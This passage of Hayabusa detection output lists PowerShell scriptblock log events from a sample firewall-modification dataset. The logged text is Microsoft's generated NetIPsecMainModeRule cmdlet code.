$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } 
} Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { 
[object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(Para",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { 
[object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 